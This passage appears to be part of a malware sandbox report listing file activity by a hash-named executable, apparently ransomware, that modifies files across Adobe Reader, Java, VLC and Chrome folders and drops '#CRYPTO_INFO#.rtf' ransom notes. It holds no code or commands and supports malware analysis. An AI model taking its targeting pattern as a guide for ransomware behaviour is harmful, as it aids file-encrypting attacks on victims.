8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.war 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\ExpandCheckpoint.ppsx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\fillandsign.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\meta-index 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-ui-theme.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\InAppSign.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\virgo_mycomputer_folder_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\resources.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ja_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_opencarat_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-down_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\3RDPARTY 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-down_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_move_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\mc.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-modules.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\el_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\startNetworkServer 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\StartPing.mpv2 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder-default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\preloaded_data.pb 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 